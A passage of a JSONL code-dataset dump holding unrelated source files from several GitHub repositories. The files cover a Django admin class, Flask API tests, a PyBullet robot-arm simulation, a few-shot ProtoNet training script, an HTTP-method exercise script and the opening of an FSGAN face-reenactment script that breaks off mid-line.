FMVAdmin(OSMGeoAdmin, _FileGetNameMixin):\n list_display = (\n 'pk',\n 'get_name',\n 'status',\n 'modified',\n 'created',\n 'fmv_data_link',\n 'klv_data_link',\n )\n readonly_fields = (\n 'modified',\n 'created',\n 'klv_file',\n 'web_video_file',\n 'frame_rate',\n ) + TASK_EVENT_READONLY\n inlines = (FMVMetaInline,)\n actions = (reprocess,)\n list_filter = MODIFIABLE_FILTERS + TASK_EVENT_FILTERS\n raw_id_fields = ('file',)\n","repo_name":"ResonantGeoData/ResonantGeoData","sub_path":"django-rgd-fmv/rgd_fmv/admin/fmv.py","file_name":"fmv.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"71"} +{"seq_id":"20839057899","text":"# tests/test_views.py\nfrom flask_testing import TestCase\nfrom wsgi import app\n\nclass TestViews(TestCase):\n def create_app(self):\n app.config['TESTING'] = True\n return app\n\n def test_products_json(self):\n response = self.client.get(\"/api/v1/products\")\n products = response.json\n self.assertIsInstance(products, list)\n self.assertGreater(len(products), 2) # 2 is not a mistake here.\n\n def test_product_found(self):\n response = self.client.get(\"/api/v1/products/1\")\n print(response.status_code)\n product = response.json\n self.assertIsInstance(product, dict)\n self.assertEqual(product.get('id'), 1)\n\n def test_product_not_found(self):\n response = self.client.get(\"/api/v1/products/4\")\n print(response.status_code)\n product = response.json\n self.assertEqual(product, None)\n\n def test_product_delete(self):\n response = self.client.get(\"/api/v1/products/1\")\n print(\"code retour delete: \" + 
str(response.status_code))\n","repo_name":"vulocke/apirest","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"26554506458","text":"import torch\nimport torch.nn as nn\n\nfrom time_embedding import TimeEmbedding\n\n\nclass ModelTest(nn.Module):\n def __init__(self, **kwargs):\n super(ModelTest, self).__init__()\n self.time_emb = TimeEmbedding(20,64)\n\n def forward(self, input1):\n emb = self.time_emb(input1)\n return emb\n\n\nif __name__ == '__main__':\n model = ModelTest()\n\n x = torch.randn([10,20]).unsqueeze(2)\n results = model(x)\n \n assert results.shape == torch.Size([10, 20, 64])","repo_name":"marlesson/time-dependant-rnn-embeddings-pytorch","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"2094174972","text":"from concurrent.futures import thread\nfrom typing import Tuple, List, Optional, Dict\nimport time\nimport numpy as np\nfrom pathlib import Path\nimport pybullet as pb\nimport pybullet_data\n\nROBOT_BASE_POSITION = (0, 0, 0)\nBALL_START_POSITION = (0.25, 0.5, 0.05)\nCAMERA_TARGET_POSITION = BALL_START_POSITION\nCAMERA_DISTANCE = 0.8\nBALL_MASS = 1\nALPHA = 300\n\nPARAMETERS_DIR = Path(__file__).parent / \"calibration\" / \"parameters\"\nCAMERA_MATRIX_PATH = str(PARAMETERS_DIR / \"mtx.npy\")\nDISTORTION_MATRIX_PATH = str(PARAMETERS_DIR / \"dist.npy\")\n\nclass RobotArm:\n GRIPPER_CLOSED = 0.\n GRIPPER_OPENED = 1.\n def __init__(self):\n '''Robot Arm simulated in Pybullet, with support for performing top-down\n grasps within a specified workspace\n '''\n # placing robot higher above ground improves top-down grasping ability\n self._id = pb.loadURDF(\"assets/urdf/xarm.urdf\",\n basePosition=ROBOT_BASE_POSITION,\n flags=pb.URDF_USE_SELF_COLLISION)\n\n # these are hard coded based on how urdf is written\n self.arm_joint_ids = [1,2,3,4,5]\n self.gripper_joint_ids = [6,7]\n self.dummy_joint_ids = [8]\n self.finger_joint_ids = [9,10]\n self.end_effector_link_index = 11\n\n self.arm_joint_limits = np.array(((-2, -1.58, -2, -1.8, -2),\n ( 2, 1.58, 2, 2.0, 2)))\n # Don't open the gripper as much\n self.gripper_joint_limits = np.array(((0.075,0.075),\n (0.25, 0.25)))\n\n # chosen to move arm out of view of camera\n self.home_arm_jpos = [0., -1.1, 1.4, 1.3, 0.]\n\n # joint constraints are needed for four-bar linkage in xarm fingers\n for i in [0,1]:\n constraint = pb.createConstraint(self._id,\n self.gripper_joint_ids[i],\n self._id,\n self.finger_joint_ids[i],\n pb.JOINT_POINT2POINT,\n (0,0,0),\n (0,0,0.03),\n (0,0,0))\n pb.changeConstraint(constraint, maxForce=1000000)\n\n # reset joints in hand so that constraints are satisfied\n hand_joint_ids = self.gripper_joint_ids + self.dummy_joint_ids + self.finger_joint_ids\n hand_rest_states = [0.05, 0.05, 0.055, 0.0155, 0.031]\n [pb.resetJointState(self._id, j_id, jpos)\n for j_id,jpos in zip(hand_joint_ids, hand_rest_states)]\n\n # allow finger and linkages to move freely\n pb.setJointMotorControlArray(self._id,\n self.dummy_joint_ids+self.finger_joint_ids,\n pb.POSITION_CONTROL,\n forces=[0,0,0])\n\n def move_gripper_to(self, position: List[float], theta: float):\n '''Commands motors to move end effector to desired position, oriented\n downwards with a rotation of theta about z-axis\n\n Parameters\n ----------\n position\n xyz position 
that end effector should move toward\n theta\n rotation (in radians) of the gripper about the z-axis.\n\n Returns\n -------\n bool\n True if movement is successful, False otherwise.\n '''\n quat = pb.getQuaternionFromEuler((0,-np.pi,theta))\n arm_jpos, _ = self.solve_ik(position, quat)\n\n return self.move_arm_to_jpos(arm_jpos)\n\n def solve_ik(self,\n pos: List[float],\n quat: Optional[List[float]]=None,\n ) -> Tuple[List[float], Dict[str, float]]:\n '''Calculates inverse kinematics solution for a desired end effector\n position and (optionally) orientation, and returns residuals\n\n Hint\n ----\n To calculate residuals, you can get the pose of the end effector link using\n `pybullet.getLinkState` (but you need to set the arm joint positions first)\n\n Parameters\n ----------\n pos\n target xyz position of end effector\n quat\n target orientation of end effector as unit quaternion if specified.\n otherwise, ik solution ignores final orientation\n\n Returns\n -------\n list\n joint positions of arm that would result in desired end effector\n position and orientation. in order from base to wrist\n dict\n position and orientation residuals:\n {'position' : || pos - achieved_pos ||,\n 'orientation' : 1 - ||}\n '''\n n_joints = pb.getNumJoints(self._id)\n all_jpos = pb.calculateInverseKinematics(self._id,\n self.end_effector_link_index,\n pos,\n quat,\n maxNumIterations=20,\n jointDamping=n_joints*[0.005])\n arm_jpos = all_jpos[:len(self.arm_joint_ids)]\n\n # teleport arm to check acheived pos and orientation\n old_arm_jpos = list(zip(*pb.getJointStates(self._id, self.arm_joint_ids)))[0]\n [pb.resetJointState(self._id, i, jp) for i,jp in zip(self.arm_joint_ids, arm_jpos)]\n achieved_pos, achieved_quat = pb.getLinkState(self._id, self.end_effector_link_index)[:2]\n [pb.resetJointState(self._id, i, jp) for i,jp in zip(self.arm_joint_ids, old_arm_jpos)]\n\n residuals = {'position' : np.linalg.norm(np.subtract(pos, achieved_pos)),\n 'orientation' : 1 - np.abs(np.dot(quat, achieved_quat))}\n\n return arm_jpos, residuals\n\n def move_arm_to_jpos(self, arm_jpos: List[float]) -> bool:\n '''Commands motors to move arm to desired joint positions\n\n Parameters\n ----------\n arm_jpos\n joint positions (radians) of arm joints, ordered from base to wrist\n\n Returns\n -------\n bool\n True if movement is successful, False otherwise.\n '''\n # cannot use setJointMotorControlArray because API does not expose\n # maxVelocity argument, which is needed for stable object manipulation\n for j_id, jpos in zip(self.arm_joint_ids, arm_jpos):\n pb.setJointMotorControl2(self._id,\n j_id,\n pb.POSITION_CONTROL,\n jpos,\n positionGain=0.2,\n maxVelocity=0.8)\n\n return self.monitor_movement(arm_jpos, self.arm_joint_ids)\n\n def set_gripper_state(self, gripper_state: float) -> bool:\n '''Commands motors to move gripper to given state\n\n Parameters\n ----------\n gripper_state\n gripper state is a continuous number from 0. (fully closed)\n to 1. 
(fully open)\n\n Returns\n -------\n bool\n True if movement is successful, False otherwise.\n\n Raises\n ------\n AssertionError\n If `gripper_state` is outside the range [0,1]\n '''\n assert 0 <= gripper_state <= 1, 'Gripper state must be in range [0,1]'\n\n gripper_jpos = (1-gripper_state)*self.gripper_joint_limits[0] \\\n + gripper_state*self.gripper_joint_limits[1]\n\n pb.setJointMotorControlArray(self._id,\n self.gripper_joint_ids,\n pb.POSITION_CONTROL,\n gripper_jpos,\n positionGains=[0.2, 0.2])\n\n success = self.monitor_movement(gripper_jpos, self.gripper_joint_ids)\n return success\n\n def monitor_movement(self,\n target_jpos: List[float],\n joint_ids: List[int],\n ) -> bool:\n '''Monitors movement of motors to detect early stoppage or success.\n\n Note\n ----\n Current implementation calls `pybullet.stepSimulation`, without which the\n simulator will not move the motors. You can avoid this by setting\n `pybullet.setRealTimeSimulation(True)` but this is usually not advised.\n\n Parameters\n ----------\n target_jpos\n final joint positions that motors are moving toward\n joint_ids\n the joint ids associated with each `target_jpos`, used to read out\n the joint state during movement\n\n Returns\n -------\n bool\n True if movement is successful, False otherwise.\n '''\n old_jpos = list(zip(*pb.getJointStates(self._id, joint_ids)))[0]\n while True:\n [pb.stepSimulation() for _ in range(10)]\n\n time.sleep(0.01)\n\n achieved_jpos = list(zip(*pb.getJointStates(self._id, joint_ids)))[0]\n if np.allclose(target_jpos, achieved_jpos, atol=1e-3):\n # success\n return True\n\n if np.allclose(achieved_jpos, old_jpos, atol=1e-3):\n # movement stopped\n return False\n old_jpos = achieved_jpos\n\n\nclass Camera:\n def __init__(self) -> None:\n '''Camera that is mounted to view workspace from above\n '''\n self.img_width = 1440\n self.img_height = 960\n\n self.view_mtx = pb.computeViewMatrixFromYawPitchRoll(\n cameraTargetPosition=CAMERA_TARGET_POSITION,\n distance=CAMERA_DISTANCE,\n roll=0,\n pitch=0,\n yaw=0,\n upAxisIndex=2\n )\n\n \n camera_vis_id = pb.createVisualShape(pb.GEOM_BOX,\n halfExtents=[0.02, 0.05, 0.02],\n rgbaColor=[0,0,0,0.1])\n camera_body = pb.createMultiBody(0, -1, camera_vis_id)\n\n view_mtx = np.array(self.view_mtx).reshape((4,4),order='F')\n cam_pos = np.dot(view_mtx[:3,:3].T, -view_mtx[:3,3])\n cam_euler = np.array([0, 0, 0])\n cam_quat = pb.getQuaternionFromEuler(cam_euler)\n pb.resetBasePositionAndOrientation(camera_body, cam_pos, cam_quat)\n\n self.camera_mtx = np.load(CAMERA_MATRIX_PATH)\n self.dist_mtx = np.load(DISTORTION_MATRIX_PATH)\n cam_fov = np.degrees(2 * np.arctan2(self.img_height, 2 * self.camera_mtx[1, 1]))\n self.proj_mtx = pb.computeProjectionMatrixFOV(fov=cam_fov,\n aspect=1,\n nearVal=0.01,\n farVal=1)\n\n def get_rgb_image(self) -> np.ndarray:\n '''Takes rgb image\n\n Returns\n -------\n np.ndarray\n shape (H,W,3) with dtype=np.uint8\n '''\n rgba = pb.getCameraImage(width=self.img_width,\n height=self.img_height,\n viewMatrix=self.view_mtx,\n projectionMatrix=self.proj_mtx,\n renderer=pb.ER_TINY_RENDERER)[2]\n\n return rgba[...,:3]\n\n\nclass GraspingEnv:\n def __init__(self, render: bool=True) -> None:\n '''Pybullet simulator with robot that performs top down grasps of a\n single object. 
A camera is positioned to take images of workspace\n from above.\n '''\n self.client = pb.connect(pb.GUI if render else pb.DIRECT)\n pb.setPhysicsEngineParameter(numSubSteps=0,\n numSolverIterations=100,\n solverResidualThreshold=1e-7,\n constraintSolverType=pb.CONSTRAINT_SOLVER_LCP_SI)\n pb.setGravity(0,0,-10)\n\n # create ground plane\n pb.setAdditionalSearchPath(pybullet_data.getDataPath())\n # offset plane y-dim to place white tile under workspace\n self.plane_id = pb.loadURDF('plane.urdf', (0,-0.5,0))\n\n # makes collisions with plane more stable\n pb.changeDynamics(self.plane_id, -1,\n linearDamping=0.04,\n angularDamping=0.04,\n restitution=0,\n contactStiffness=3000,\n contactDamping=100)\n\n # add robots\n self.robot = RobotArm()\n\n # add the ball\n self.ball_id, self.ball_coll_id, self.ball_vis_id = self.create_ball(\n radius=0.025, \n start_pos=BALL_START_POSITION, \n start_orn_euler=[0.0, 0.0, 0.0]\n )\n\n # add camera\n self.camera = Camera()\n\n\n @staticmethod\n def create_ball(radius: float, start_pos: List[float], start_orn_euler: List[float]) -> Tuple[int, int, int]:\n '''\n Create the ball to use in the simulation. Also sets the initial position and orientation (in radians)\n\n Returns a tuple representing (object_id, collision_id, visual_id)\n '''\n\n # create collision item\n coll_id = pb.createCollisionShape(\n shapeType=pb.GEOM_SPHERE,\n radius=radius\n )\n\n # create visual item\n vis_id = pb.createVisualShape(\n shapeType=pb.GEOM_SPHERE,\n radius=radius,\n rgbaColor=[1.0, 0.0, 0.0, 1.0]\n )\n\n object_id = pb.createMultiBody(BALL_MASS, coll_id, vis_id, basePosition=start_pos, baseOrientation=pb.getQuaternionFromEuler(start_orn_euler))\n\n pb.changeDynamics(\n object_id, \n -1,\n lateralFriction=1,\n spinningFriction=0.005,\n rollingFriction=0.005\n )\n\n return (object_id, coll_id, vis_id)\n\n\n def take_picture(self) -> np.ndarray:\n '''Takes picture using camera\n\n Returns\n -------\n np.ndarray\n rgb image of shape (H,W,3) and dtype of np.uint8\n '''\n return self.camera.get_rgb_image()\n\ndef test_env():\n '''Test the the evironment is set up correctly\n '''\n env = GraspingEnv(True)\n\n pb.resetBaseVelocity(\n objectUniqueId=env.ball_id,\n linearVelocity=[0.0, -0.5, 0.0]\n )\n pb.changeDynamics(\n env.ball_id,\n -1,\n lateralFriction=0.01,\n spinningFriction=0.005,\n rollingFriction=0.005\n )\n\n import time\n counter = 0\n\n while 1:\n pb.stepSimulation()\n time.sleep(1./256)\n\n if counter % 256 == 0:\n env.take_picture()\n\n counter += 1\n\nif __name__ == \"__main__\":\n test_env()\n","repo_name":"matthew-gries/RobotArmSoccer","sub_path":"robot_arm_soccer/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":14827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"15417034898","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import ndimage\nimport multiprocessing as mp\nimport os\nimport cv2\n\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\n# Check GPU - False\n# print(torch.cuda.is_available())\n\n# Extract files\n\n'''\nimport zipfile\n\nwith zipfile.ZipFile('./data/images_background.zip') as z:\n z.extractall('.')\n\nwith zipfile.ZipFile('./data/images_evaluation.zip') as z:\n z.extractall('.')\n'''\n\n# Read data\n\ndef read_alphabets(alphabet_directory_path, alphabet_directory_name):\n datax = []\n datay = []\n characteres = 
os.listdir(alphabet_directory_path)\n\n for character in characteres:\n images = os.listdir(alphabet_directory_path + character + '/')\n for img in images:\n image = cv2.resize(\n cv2.imread(alphabet_directory_path + character + '/' + img), (28,28)\n )\n # rotations of image\n rotated_90 = ndimage.rotate(image, 90)\n rotated_180 = ndimage.rotate(image, 180)\n rotated_270 = ndimage.rotate(image, 270)\n datax.extend((image, rotated_90, rotated_180, rotated_270))\n datay.extend((\n alphabet_directory_name + '_' + character + '_0',\n alphabet_directory_name + '_' + character + '_90',\n alphabet_directory_name + '_' + character + '_180',\n alphabet_directory_name + '_' + character + '_270',\n ))\n return np.array(datax), np.array(datay)\n\ndef read_images(base_directory):\n datax = None\n datay = None\n\n pool = mp.Pool(mp.cpu_count())\n\n results = [pool.apply(read_alphabets, args=(\n base_directory + '/' + directory + '/', directory, \n )) for directory in os.listdir(base_directory)]\n pool.close()\n\n for result in results:\n if datax is None:\n datax = result[0]\n datay = result[1]\n else:\n datax = np.vstack([datax, result[0]])\n datay = np.concatenate([datay, result[1]])\n return datax, datay\n\n\ntrainx, trainy = read_images('images_background')\ntestx, testy = read_images('images_evaluation')\n\nprint(trainx.shape, trainy.shape, testx.shape, testy.shape)\n\n# Create sample\n\ndef extract_sample(n_way, n_support, n_query, datax, datay):\n sample = []\n K = np.random.choice(np.unique(datay), n_way, replace=False)\n for cls in K:\n datax_cls = datax[datay == cls]\n perm = np.random.permutation(datax_cls)\n sample_cls = perm[:(n_support+n_query)]\n sample.append(sample_cls)\n sample = np.array(sample)\n sample = torch.from_numpy(sample).float()\n sample = sample.permute(0,1,4,2,3)\n return({\n 'images': sample,\n 'n_way': n_way,\n 'n_support': n_support,\n 'n_query': n_query\n }) \n\n\ndef display_sample(sample):\n sample_4D = sample.view(sample.shape[0]*sample.shape[1],*sample.shape[2:])\n #make a grid\n out = torchvision.utils.make_grid(sample_4D, nrow=sample.shape[1])\n plt.figure(figsize = (16,7))\n plt.imshow(out.permute(1, 2, 0))\n\n\nsample_example = extract_sample(8, 5, 5, trainx, trainy)\ndisplay_sample(sample_example['images'])\n\nsample_example['images'].shape\n\nclass Flatten(nn.Module):\n def __init__(self):\n super(Flatten, self).__init__()\n def forward(self, x):\n return x.view(x.size(0), -1)\n\ndef load_protonet_conv(**kwargs):\n x_dim = kwargs['x_dim']\n hid_dim = kwargs['hid_dim']\n z_dim = kwargs['z_dim']\n\n def conv_block(in_channels, out_channels):\n return nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 3, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(),\n nn.MaxPool2d(2)\n )\n encoder = nn.Sequential(\n conv_block(x_dim[0], hid_dim),\n conv_block(hid_dim, hid_dim),\n conv_block(hid_dim, hid_dim),\n conv_block(hid_dim, z_dim),\n Flatten()\n )\n \n return ProtoNet(encoder)\n\nclass ProtoNet(nn.Module):\n def __init__(self, encoder):\n super(ProtoNet, self).__init__()\n self.encoder = encoder.cuda()\n\n def set_forward_loss(self, sample):\n \n sample_images = sample['images'].cuda()\n n_way = sample['n_way']\n n_support = sample['n_support']\n n_query = sample['n_query']\n\n x_support = sample_images[:, :n_support]\n x_query = sample_images[:, n_support:]\n\n target_inds = torch.arange(0, n_way).view(n_way, 1, 1).expand(n_way, n_query, 1).long()\n target_inds = Variable(target_inds, requires_grad=False)\n target_inds = target_inds.cuda()\n \n \n x = 
torch.cat([x_support.contiguous().view(n_way * n_support, *x_support.size()[2:]),\n x_query.contiguous().view(n_way * n_query, *x_query.size()[2:])], 0)\n \n z = self.encoder.forward(x)\n z_dim = z.size(-1) #usually 64\n z_proto = z[:n_way*n_support].view(n_way, n_support, z_dim).mean(1)\n z_query = z[n_way*n_support:]\n\n #compute distances\n dists = euclidean_dist(z_query, z_proto)\n \n #compute probabilities\n log_p_y = F.log_softmax(-dists, dim=1).view(n_way, n_query, -1)\n \n loss_val = -log_p_y.gather(2, target_inds).squeeze().view(-1).mean()\n _, y_hat = log_p_y.max(2)\n acc_val = torch.eq(y_hat, target_inds.squeeze()).float().mean()\n \n return loss_val, {\n 'loss': loss_val.item(),\n 'acc': acc_val.item(),\n 'y_hat': y_hat\n }\n\ndef euclidean_dist(x, y):\n n = x.size(0)\n m = y.size(0)\n d = x.size(1)\n assert d == y.size(1)\n\n x = x.unsqueeze(1).expand(n, m, d)\n y = y.unsqueeze(0).expand(n, m, d)\n\n return torch.pow(x - y, 2).sum(2)\n\ndef train(model, optimizer, train_x, train_y, n_way, n_support, n_query, max_epoch, epoch_size):\n scheduler = optim.lr_scheduler.StepLR(optimizer, 1, gamma=0.5, last_epoch=-1)\n epoch = 0 #epochs done so far\n stop = False #status to know when to stop\n\n while epoch < max_epoch and not stop:\n running_loss = 0.0\n running_acc = 0.0\n\n for episode in range(epoch_size):\n sample = extract_sample(n_way, n_support, n_query, train_x, train_y)\n optimizer.zero_grad()\n loss, output = model.set_forward_loss(sample)\n running_loss += output['loss']\n running_acc += output['acc']\n loss.backward()\n optimizer.step()\n epoch_loss = running_loss / epoch_size\n epoch_acc = running_acc / epoch_size\n print('Epoch {:d} -- Loss: {:.4f} Acc: {:.4f}'.format(epoch+1,epoch_loss, epoch_acc))\n epoch += 1\n scheduler.step()\n\nprint(torch.cuda.is_available())\n\nmodel = load_protonet_conv(\n x_dim=(3,28,28),\n hid_dim=64,\n z_dim=64,\n )\n\noptimizer = optim.Adam(model.parameters(), lr = 0.001)\n\nn_way = 60\nn_support = 5\nn_query = 5\n\ntrain_x = trainx\ntrain_y = trainy\n\nmax_epoch = 5\nepoch_size = 2000\n\ntrain(model, optimizer, train_x, train_y, n_way, n_support, n_query, max_epoch, epoch_size)\n\ndef test(model, test_x, test_y, n_way, n_support, n_query, test_episode):\n running_loss = 0.0\n running_acc = 0.0\n for episode in range(test_episode):\n sample = extract_sample(n_way, n_support, n_query, test_x, test_y)\n loss, output = model.set_forward_loss(sample)\n running_loss += output['loss']\n running_acc += output['acc']\n avg_loss = running_loss / test_episode\n avg_acc = running_acc / test_episode\n print('Test results -- Loss: {:.4f} Acc: {:.4f}'.format(avg_loss, avg_acc))\n\n\nn_way = 5\nn_support = 5\nn_query = 5\n\ntest_x = testx\ntest_y = testy\n\ntest_episode = 1000\n\ntest(model, test_x, test_y, n_way, n_support, n_query, test_episode)\n\nmy_sample = extract_sample(n_way, n_support, n_query, test_x, test_y)\ndisplay_sample(my_sample['images'])\n\nmy_loss, my_output = model.set_forward_loss(my_sample)\n\n","repo_name":"maluarmini/Protonet_few_shot_omniglot","sub_path":"protonet.py","file_name":"protonet.py","file_ext":"py","file_size_in_byte":7991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"40857648032","text":"def get_num_classes(pbtxt_fname):\n from object_detection.utils import label_map_util\n label_map = label_map_util.load_labelmap(pbtxt_fname)\n categories = label_map_util.convert_label_map_to_categories(\n label_map, max_num_classes=90, use_display_name=True)\n 
category_index = label_map_util.create_category_index(categories)\n return len(category_index.keys())\n\nnum_classes = get_num_classes('./labelmap.pbtxt')\nprint(num_classes) # Print the num_classes value","repo_name":"sivertheisholt/Object-Detection-WSL2","sub_path":"get_num_classes.py","file_name":"get_num_classes.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"24768252222","text":"import requests\nimport json\n\nlist_of_real_types = [\"GET\", \"POST\", \"PUT\", \"DELETE\"]\nfake_method = \"HEAD\"\n\n# Делаем запрос без параметра method\nresponse_without_method = requests.post(\"https://playground.learnqa.ru/ajax/api/compare_query_type\")\n\nprint(\"Checking request without method:\")\nprint(response_without_method.text)\n\n# Делаем запрос с заведомо некорректным методом\nresponse_with_fake_method = requests.get(\"https://playground.learnqa.ru/ajax/api/compare_query_type\",\n params={\"method\": f\"{fake_method}\"})\nprint(\"\\nChecking request with fake method:\")\nprint(response_with_fake_method.text)\n\n# Делаем запрос с корректным значением метода\nresponse_with_method = requests.get(\"https://playground.learnqa.ru/ajax/api/compare_query_type\",\n params={\"method\": \"GET\"})\nprint(\"\\nChecking request with real method:\")\nprint(response_with_method.text)\n\n# Пишем цикл для проверки всех возможных вариантов типа запросов и переданных методов\nfor item in range(len(list_of_real_types)):\n for element in range(len(list_of_real_types)):\n http_method = list_of_real_types[element].lower()\n header_method = list_of_real_types[item]\n if http_method in \"get\":\n response = requests.request(method=http_method, url=\"https://playground.learnqa.ru/ajax/api/compare_query_type\",\n params={\"method\": f\"{header_method}\"})\n else:\n response = requests.request(method=http_method,\n url=\"https://playground.learnqa.ru/ajax/api/compare_query_type\",\n data={\"method\": f\"{header_method}\"})\n print(f\"\\nType of request - {http_method} and method - {header_method}:\")\n if http_method in header_method.lower():\n try:\n parsed_response = json.loads(response.text)\n print(parsed_response)\n except json.JSONDecodeError:\n print(\"Response not include any JSON object.\")\n print(response.text)\n else:\n print(response.text)\n","repo_name":"l0myy/LearnQA_PythonAPI","sub_path":"Lesson2/requests_and_methods.py","file_name":"requests_and_methods.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72763795111","text":"\"\"\" Image to video stepwise face reenactment. 
\"\"\"\n\nimport os\nfrom math import cos, sin, atan2, asin\nimport face_alignment\nimport cv2\nimport numpy as np\nfrom tqdm import tqdm\nimport torch\nimport fsgan.data.landmark_transforms as landmark_transforms\nimport fsgan.utils.utils as utils\nfrom fsgan.utils.img_utils import create_pyramid\nfrom fsgan.utils.obj_factory import obj_factory\nfrom fsgan.utils.video_utils import extract_landmarks_bboxes_euler_3d_from_video\nfrom fsgan.utils.heatmap import LandmarkHeatmap\nfrom fsgan.models.hopenet import Hopenet\n\n\ndef main(source_path, target_path,\n arch='res_unet_split.MultiScaleResUNet(in_nc=71,out_nc=(3,3),flat_layers=(2,0,2,3),ngf=128)',\n model_path='../weights/ijbc_msrunet_256_1_2_reenactment_stepwise_v1.pth',\n pose_model_path='../weights/hopenet_robust_alpha1.pth',\n pil_transforms1=('landmark_transforms.FaceAlignCrop(bbox_scale=1.2)', 'landmark_transforms.Resize(256)',\n 'landmark_transforms.Pyramids(2)'),\n pil_transforms2=('landmark_transforms.FaceAlignCrop(bbox_scale=1.2)', 'landmark_transforms.Resize(256)',\n 'landmark_transforms.Pyramids(2)'),\n tensor_transforms1=('landmark_transforms.ToTensor()',\n 'transforms.Normalize(mean=[0.5,0.5,0.5],std=[0.5,0.5,0.5])'),\n tensor_transforms2=('landmark_transforms.ToTensor()',\n 'transforms.Normalize(mean=[0.5,0.5,0.5],std=[0.5,0.5,0.5])'),\n output_path=None, crop_size=256, display=False):\n torch.set_grad_enabled(False)\n\n # Initialize models\n fa = face_alignment.FaceAlignment(face_alignment.LandmarksType._3D, flip_input=True)\n device, gpus = utils.set_device()\n G = obj_factory(arch).to(device)\n checkpoint = torch.load(model_path)\n G.load_state_dict(checkpoint['state_dict'])\n G.train(False)\n\n # Initialize pose\n Gp = Hopenet().to(device)\n checkpoint = torch.load(pose_model_path)\n Gp.load_state_dict(checkpoint['state_dict'])\n Gp.train(False)\n\n # Initialize landmarks to heatmaps\n landmarks2heatmaps = [LandmarkHeatmap(kernel_size=13, size=(256, 256)).to(device),\n LandmarkHeatmap(kernel_size=7, size=(128, 128)).to(device)]\n\n # Initialize transformations\n pil_transforms1 = obj_factory(pil_transforms1) if pil_transforms1 is not None else []\n pil_transforms2 = obj_factory(pil_transforms2) if pil_transforms2 is not None else []\n tensor_transforms1 = obj_factory(tensor_transforms1) if tensor_transforms1 is not None else []\n tensor_transforms2 = obj_factory(tensor_transforms2) if tensor_transforms2 is not None else []\n img_transforms1 = landmark_transforms.ComposePyramids(pil_transforms1 + tensor_transforms1)\n img_transforms2 = landmark_transforms.ComposePyramids(pil_transforms2 + tensor_transforms2)\n\n # Process source image\n source_bgr = cv2.imread(source_path)\n source_rgb = source_bgr[:, :, ::-1]\n source_landmarks, source_bbox = process_image(fa, source_rgb, crop_size)\n if source_bbox is None:\n raise RuntimeError(\"Couldn't detect a face in source image: \" + source_path)\n source_tensor, source_landmarks, source_bbox = img_transforms1(source_rgb, source_landmarks, source_bbox)\n source_cropped_bgr = tensor2bgr(source_tensor[0] if isinstance(source_tensor, list) else source_tensor)\n for i in range(len(source_tensor)):\n source_tensor[i] = source_tensor[i].unsqueeze(0).to(device)\n\n # Extract landmarks, bounding boxes, euler angles, and 3D landmarks from target video\n frame_indices, landmarks, bboxes, eulers, landmarks_3d = \\\n extract_landmarks_bboxes_euler_3d_from_video(target_path, Gp, fa, device=device)\n if frame_indices.size == 0:\n raise RuntimeError('No faces were detected in the target video: 
' + target_path)\n\n    # Open target video file\n    cap = cv2.VideoCapture(target_path)\n    if not cap.isOpened():\n        raise RuntimeError('Failed to read target video: ' + target_path)\n    total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n    fps = cap.get(cv2.CAP_PROP_FPS)\n\n    # Initialize output video file\n    if output_path is not None:\n        if os.path.isdir(output_path):\n            output_filename = os.path.splitext(os.path.basename(source_path))[0] + '_' + \\\n                              os.path.splitext(os.path.basename(target_path))[0] + '.mp4'\n            output_path = os.path.join(output_path, output_filename)\n        fourcc = cv2.VideoWriter_fourcc(*'avc1')\n        out_vid = cv2.VideoWriter(output_path, fourcc, fps,\n                                  (source_cropped_bgr.shape[1]*3, source_cropped_bgr.shape[0]))\n    else:\n        out_vid = None\n\n    # For each frame in the target video\n    valid_frame_ind = 0\n    for i in tqdm(range(total_frames)):\n        ret, target_bgr = cap.read()\n        if target_bgr is None:\n            continue\n        if i not in frame_indices:\n            continue\n        target_rgb = target_bgr[:, :, ::-1]\n        target_tensor, target_landmarks, target_bbox = img_transforms2(target_rgb, landmarks_3d[valid_frame_ind],\n                                                                       bboxes[valid_frame_ind])\n        target_euler = eulers[valid_frame_ind]\n        valid_frame_ind += 1\n\n        # TODO: Calculate the number of required reenactment iterations\n        reenactment_iterations = 2\n\n        # Generate landmarks sequence\n        target_landmarks_sequence = []\n        for ri in range(1, reenactment_iterations):\n            interp_landmarks = []\n            for j in range(len(source_tensor)):\n                alpha = float(ri) / reenactment_iterations\n                curr_interp_landmarks_np = interpolate_points(source_landmarks[j].cpu().numpy(),\n                                                              target_landmarks[j].cpu().numpy(), alpha=alpha)\n                interp_landmarks.append(torch.from_numpy(curr_interp_landmarks_np))\n            target_landmarks_sequence.append(interp_landmarks)\n        target_landmarks_sequence.append(target_landmarks)\n\n        # Iterative reenactment\n        out_img_tensor = source_tensor\n        for curr_target_landmarks in target_landmarks_sequence:\n            out_img_tensor = create_pyramid(out_img_tensor, 2)\n            input_tensor = []\n            for j in range(len(out_img_tensor)):\n                curr_target_landmarks[j] = curr_target_landmarks[j].unsqueeze(0).to(device)\n                curr_target_landmarks[j] = landmarks2heatmaps[j](curr_target_landmarks[j])\n                input_tensor.append(torch.cat((out_img_tensor[j], curr_target_landmarks[j]), dim=1))\n            out_img_tensor, out_seg_tensor = G(input_tensor)\n\n        # Convert back to numpy images\n        out_img_bgr = 